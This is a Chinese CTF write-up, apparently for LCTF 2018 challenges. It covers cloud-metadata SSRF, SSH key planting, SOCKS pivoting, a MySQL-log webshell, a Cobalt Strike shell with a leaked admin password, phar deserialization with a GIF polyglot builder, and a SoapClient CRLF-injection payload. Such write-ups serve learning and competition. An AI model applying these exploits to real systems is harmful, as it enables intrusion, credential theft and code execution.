Travel

这题一开始一直在找 SSRF 的利用点：`?url=` 参数由服务端去发起请求，而腾讯云主机的元数据接口（metadata.tencentyun.com）可以返回 MAC 地址

http://118.25.150.86/?url=http://metadata.tencentyun.com/latest/meta-data/network/interfaces/macs

返回了 MAC 地址

52:54:00:48:c8:73

然后就能算出 Python `uuid.getnode()` 的返回值（它就是这个 MAC 地址按大端解释成的整数：0x52540048c873 = 90520735500403）

90520735500403

但是 nginx 禁用了 PUT 请求，可以改发 POST 并带上 `X-HTTP-Method-Override: PUT` 头来绕过——nginx 只看到一个 POST，由后端框架根据该头把请求当作 PUT 处理，所以前提是后端支持这个头。参考文章：

https://www.web-tinker.com/article/20995.html

然后通过 PUT 把自己的 SSH 公钥写进目标的 authorized_keys（写入的应是公钥，私钥留在本地），再用对应的私钥 ssh 连进去

God of domain-pentest

首先用 nmap 扫一下端口，发现 1090 开着 SOCKS5 代理服务；挂上这个代理扫内网网段，扫出 172.21.0.8 开着 80 端口。

将该 SOCKS5 代理添加进 SocksCap64 中（让后续工具的流量都走代理）

扫到 phpMyAdmin，登录后台后利用 MySQL 日志（general_log 指向 web 目录）写入 webshell getshell

只靠一个 webshell 做内网渗透很不方便，我先试着用 3389 远程桌面连进去看看

但是连不进去啊。

然后我在公网上起一个 CS（Cobalt Strike）的 server 端，直接在 172.21.0.8 的机器上弹个 shell 过去，拿到该机上的账号凭据：

* Username : Administrator
* Domain : PUPILES-PC
* Password : xdsec@lctf2018

通过

ipconfig /all

可以看到 DNS 服务器指向 172.21.0.7，域环境里 DNS 通常就架在域控上，据此可以判断有个域控：

DNS 服务器 . . . . . . . . . . . : 172.21.0.7
https://www.cnblogs.com/dreamer-fish/p/3473895.html

通过搜集域内信息得到域控的主机名：SUB-DC.web.lctf.com

show me shell1

代码如下

<?php
// Challenge source (LCTF 2018 "show me shell"), as printed by highlight_file() in
// the default branch of the dispatcher at the bottom of this file.
// Backtick operator: runs ../read_secret through the shell and keeps its stdout as
// the HMAC key for the session cookie. "read_secret" is on the __destruct() blacklist.
$SECRET = `../read_secret`;
// Per-client directories keyed on the connecting IP. $SANDBOX cannot be predicted
// without $SECRET; $FILEBOX uses a public constant salt, so anyone who knows a
// client's REMOTE_ADDR can compute it. Behind a proxy REMOTE_ADDR is the proxy's
// address, which is why the write-up changes its exit IP to get a second sandbox.
$SANDBOX = "../data/" . md5($SECRET. $_SERVER["REMOTE_ADDR"]);
$FILEBOX = "../file/" . md5("K0rz3n". $_SERVER["REMOTE_ADDR"]);
@mkdir($SANDBOX);
@mkdir($FILEBOX);
// First visit: hand out a serialized User pointing at the sandbox, signed with
// HMAC-MD5 under $SECRET. Cookie format: "<serialized>-----<hex hmac>". The
// signature is what stops a client from choosing its own avatar path later in
// check_session().
if (!isset($_COOKIE["session-data"])) {
$data = serialize(new User($SANDBOX));
$hmac = hash_hmac("md5", $data, $SECRET);
setcookie("session-data", sprintf("%s-----%s", $data, $hmac));
}
/**
 * Payload carried in the signed "session-data" cookie.
 *
 * Serialized as O:4:"User":1:{s:6:"avatar";...} and read back by
 * check_session(), so the class name and the public property name are
 * part of the cookie format.
 */
class User {
    /** Directory holding this client's avatar.gif (the per-IP sandbox). */
    public $avatar = null;

    /**
     * @param string $path sandbox directory path
     */
    public function __construct($path) {
        $this->avatar = $path;
    }
}
// Gadget class: never instantiated by this script itself. It only matters when an
// object of it comes out of unserialize() — e.g. from the metadata of a phar
// archive that a stream function opens — because __destruct() then runs when that
// object is freed.
class K0rz3n_secret_flag {
// protected: not assignable from outside, but a serialized payload can carry it
// (serialized under the "\0*\0file_path" key). Nothing in this file sets it.
protected $file_path;
function __destruct(){
// Case-insensitive substring blacklist on the path. It covers "data" and "..",
// so the client sandbox under ../data/ cannot be targeted directly; it does not
// cover "file" (the $FILEBOX directory), "www", or absolute paths in general.
if(preg_match('/(log|etc|session|proc|data|read_secret|history|class|\.\.)/i', $this->file_path)){
die("Sorry Sorry Sorry");
}
// Local file inclusion with an attacker-chosen path: any PHP in the included
// file executes (the GIF89a-prefixed avatar upload is the obvious target).
include_once($this->file_path);
}
}
/**
 * Validate the signed "session-data" cookie and return the avatar directory.
 *
 * Cookie format: "<serialized User>-----<hmac-md5 of the serialized part under $SECRET>".
 * The signature is checked with hash_equals() before anything is unserialized, so
 * the serialized part cannot be forged without $SECRET — but it is still
 * unserialize() on cookie data, and the only check afterwards is that an `avatar`
 * property exists. Every failure path terminates the script with die().
 *
 * @return mixed the `avatar` property of the unserialized object
 */
function check_session() {
    global $SECRET;
    $raw = $_COOKIE["session-data"];
    [$payload, $signature] = explode("-----", $raw, 2);
    if (!isset($payload, $signature) || !is_string($payload) || !is_string($signature)) {
        die("Bye");
    }
    $expected = hash_hmac("md5", $payload, $SECRET);
    // Constant-time comparison of the expected MAC with the one presented.
    if (!hash_equals($expected, $signature)) {
        die("Bye Bye");
    }
    $session = unserialize($payload);
    if (!isset($session->avatar)) {
        die("Bye Bye Bye");
    }
    return $session->avatar;
}
/**
 * Fetch "<url>/avatar.gif" from a client-supplied URL and store it in the
 * client's sandbox as avatar.gif.
 *
 * The only restriction on the URL is a case-insensitive "starts with http/https"
 * test, so the server itself makes the outbound request (SSRF surface). The only
 * content check is a six-byte "GIF89a" prefix — everything after it is written
 * verbatim, which is why PHP source or a phar archive behind a GIF89a stub passes.
 * Every path ends in die().
 *
 * @param string $path sandbox directory (from check_session())
 */
function upload($path) {
    if (!isset($_GET['url'])) {
        die("Miss the URL~~");
    }
    $url = $_GET['url'];
    if (!preg_match('/^(http|https).*/i', $url)) {
        die("Hacker");
    }
    $body = file_get_contents($url . "/avatar.gif");
    if (substr($body, 0, 6) !== "GIF89a") {
        die("Fuck off");
    }
    file_put_contents($path . "/avatar.gif", $body);
    die("Upload OK");
}
/**
 * Serve the client's avatar.gif.
 *
 * If the directory from the cookie does not exist or holds no avatar.gif, the
 * path silently falls back to "/var/www" — which discloses the web root and
 * serves /var/www/avatar.gif if present. Terminates with die().
 *
 * @param string $path sandbox directory (from check_session())
 */
function show($path) {
    $missing = !is_dir($path) || !file_exists($path . "/avatar.gif");
    $dir = $missing ? "/var/www" : $path;
    header("Content-Type: image/gif");
    die(file_get_contents($dir . "/avatar.gif"));
}
// Report image dimensions. With ?c=, the path is client-chosen and goes to
// getimagesize() after a regex blacklist; otherwise the sandbox avatar is
// measured. Every path ends in die().
function check($path){
if(isset($_GET['c'])){
// Two alternatives: (1) the wrapper list is anchored with ^, so only a value that
// *starts* with one of those schemes is rejected — "compress.zlib://phar://..."
// is not; (2) "file" and ".." are rejected anywhere in the string, which rules
// out file:// and both of the ../data and ../file directories by relative path.
// The condition only dies on a truthy result: a false return from preg_match()
// (a PCRE error — note the (.|\s)* groups are the classic backtracking-heavy
// shape) falls through to the else branch like a non-match.
if(preg_match('/^(ftp|php|zlib|data|glob|phar|ssh2|rar|ogg|expect)(.|\\s)*|(.|\\s)*(file|\.\.)(.|\\s)*/i',$_GET['c'])){
die("Hacker Hacker Hacker");
}else{
$file_path = $_GET['c'];
// getimagesize() opens the path through PHP's stream wrappers, so a phar:// path
// makes the phar extension parse the archive here; on the PHP versions this
// challenge targeted that also unserializes the archive metadata (the write-up's
// trigger). NOTE(review): newer PHP defers metadata unserialization to
// getMetadata() — confirm for the version in use.
list($width, $height, $type) = @getimagesize($file_path);
die("Width is :" . $width." px<br>" .
"Height is :" . $height." px<br>");
}
}else{
list($width, $height, $type) = @getimagesize($path."/avatar.gif");
die("Width is :" . $width." px<br>" .
"Height is :" . $height." px<br>");
}
}
// Copy $source_path into the client's $FILEBOX directory under $dest_name.
// Reachable without a valid session cookie (the dispatcher calls it directly).
// Every path ends in die().
function move($source_path,$dest_name){
global $FILEBOX;
// $dest_name is concatenated unchecked — only the source is filtered below — so a
// dest containing "../" escapes $FILEBOX. copy() also accepts stream wrappers on
// both sides.
$dest_path = $FILEBOX . "/" . $dest_name;
// Unanchored, case-insensitive substring blacklist on the source only. It rules
// out the data/ and file/ directories, "..", "www" (the web root), "secret" and
// the listed schemes; being a blacklist, any wrapper not listed is not covered.
if(preg_match('/(log|etc|session|proc|root|secret|www|history|file|\.\.|ftp|php|phar|zlib|data|glob|ssh2|rar|ogg|expect|http|https)/i',$source_path)){
die("Hacker Hacker Hacker");
}else{
if(copy($source_path,$dest_path)){
die("Successful copy");
}else{
die("Copy failed");
}
}
}
// Router. $_GET["m"] is read without isset() (notice when absent) and compared
// loosely with ==. Every mode handler terminates with die(), so the trailing
// include is only reached from the default branch.
$mode = $_GET["m"];
if ($mode == "upload"){
// upload/show/check all take their directory from the signed cookie.
upload(check_session());
}
else if ($mode == "show"){
show(check_session());
}
else if ($mode == "check"){
check(check_session());
}
else if($mode == "move"){
// No check_session() here: source and dest come straight from the query string.
move($_GET['source'],$_GET['dest']);
}
else{
// Unknown or missing mode: print this file's own source (this is how the listing
// was obtained), then the comments page.
highlight_file(__FILE__);
}
include("./comments.html");

先利用 upload 接口上传一个 webshell（服务端会去取 `<url>/avatar.gif`，只检查开头 6 字节是否为 GIF89a），此时的 cookie 如下：

O:4:"User":1:{s:6:"avatar";s:40:"../data/4d9732285a8eb10a67dcbe6fba011d05";}-----720e1a11f83c75952a8ddfb354836aa6

拿到 cookie 里的沙盒路径后，挂上代理再上传一个 phar 文件。为什么要挂代理？因为沙盒目录是 md5($SECRET . REMOTE_ADDR)，每个来源 IP 只对应一个 avatar.gif，不换出口 IP 再传一次就会覆盖掉之前的 webshell。

新的Phar文件上传到了4016d7466675eb5bd236f30bd5fc87ea/avatar.gif

<?php
// Builds 1.phar: a phar archive whose stub starts with "GIF89a" (so upload()'s
// six-byte check accepts it) and whose manifest metadata is a serialized
// K0rz3n_secret_flag object. Needs phar.readonly=0 to write.
//
// Only the class name and the protected property (serialized under the
// "\0*\0file_path" key) travel in the metadata; this local copy of the class
// exists just so serialize() can produce them. Its method body never reaches the
// target — the server runs its own __destruct() with its own blacklist.
//
// NOTE(review): the server-side blacklist also rejects "data" and "..", both of
// which this file_path contains; the write-up does not show how that is handled.
class K0rz3n_secret_flag {
    protected $file_path='../data/4d9732285a8eb10a67dcbe6fba011d05/avatar.gif';

    // Mirrors the target's destructor with a shorter blacklist. It also runs
    // locally when this script ends, so expect an include warning unless that
    // relative path happens to exist here.
    function __destruct(){
        if(preg_match('/(log|etc|session|proc|read_secret|history|class)/i', $this->file_path)){
            die("Sorry Sorry Sorry");
        }
        include_once($this->file_path);
    }
}

$gadget = new K0rz3n_secret_flag;

$archive = new Phar('1.phar', 0);
$archive->startBuffering();
// Polyglot stub: GIF signature first, then the mandatory halt-compiler token.
$archive->setStub('GIF89a<?php __HALT_COMPILER(); ?>');
// The serialized gadget lives in the manifest, not in a file entry.
$archive->setMetadata($gadget);
// One dummy file entry for the archive body.
$archive->addFromString('1.txt','text');
$archive->stopBuffering();

推荐文章https://blog.zsxsoft.com/post/38

然后我们可以在 check 接口（`?m=check&c=`）中利用 getimagesize() 打开 phar:// 路径来触发反序列化。注意 check() 的正则只对开头的 wrapper 列表做了 `^` 锚定，所以用 `compress.zlib://` 包一层 `phar://` 就绕过了；但它同时会拦截出现在任意位置的 `..` 和 `file`，下面这个含 `..` 的 payload 按代码字面是会被拦下的，而且 phar 里 file_path 的 `../data/` 也命中服务端 __destruct 的黑名单——文中省略了处理这两点的步骤（另外，该判断只在 preg_match 返回真时 die，返回 false 的情况同样会放行）：

compress.zlib://phar://../data/4016d7466675eb5bd236f30bd5fc87ea/avatar.gif

beasphp’r revenge

<?php
// Challenge source (LCTF 2018), printed back to the client first.
highlight_file(__FILE__);
// String callable used at the bottom; assigned *before* the attacker-controlled
// call below, so a callee that writes variables from $_POST could replace it.
$b = 'implode';
// Arbitrary function call: the callee name comes from ?f= (bare constant f — the
// string "f" with a notice/warning on PHP 7, an Error on PHP 8) and the single
// argument is the whole $_POST array. Which function the write-up used is not
// shown on this page.
call_user_func($_GET[f],$_POST);
// The session is started only after that call, so any session-related ini
// setting it changed (if any) is what applies here.
session_start();
// ?name= is stored verbatim; it is written out by the serialize handler active
// now and parsed back on the next request by whichever handler is active then
// (the "session 反序列化" the write-up refers to).
if(isset($_GET[name])){
$_SESSION[name] = $_GET[name];
}
var_dump($_SESSION);
// First session value plus a fixed string, handed to whatever $b now names.
// With the original 'implode' an object element would at most get __toString();
// reaching SoapClient::__call needs $b to have become something that invokes a
// method on that object (not shown on this page).
$a = array(reset($_SESSION),'welcome_to_the_lctf2018');
call_user_func($b,$a);
?>
  • session反序列化
  • 利用 SoapClient 的 __call 发起 SSRF（user_agent 选项中可以注入 CRLF，附带伪造的 Cookie 等请求头）

这题与XCTF总决赛的时候一道题很类似

把序列化好的 SoapClient 对象写入 session

对反序列化出来的 SoapClient 对象调用一个不存在的方法即可触发 __call 魔术方法，进而向 location 发出请求（注意：原代码最后的 implode 本身不会调用方法，文中未写明如何让 `$b` 变成会调用对象方法的函数）

<?php
// Emits the URL-encoded serialized SoapClient that, once it lands in the target's
// session and a method is invoked on it, makes the target issue an HTTP request
// to $target. Requires ext/soap.
$target = "http://127.0.0.1/flag.php";
$options = [
    // Endpoint the SOAP request is sent to: loopback flag.php.
    'location'   => $target,
    // CRLF-terminated value: it is sent as the User-Agent header (unsanitised on
    // the PHP the challenge ran), so the extra line becomes a Cookie header.
    'user_agent' => "uuu: aaa\r\nCookie: PHPSESSID=sessionid\r\n",
    'uri'        => "121331",
];
$attack = new SoapClient(null, $options);
$payload = urlencode(serialize($attack));
echo $payload;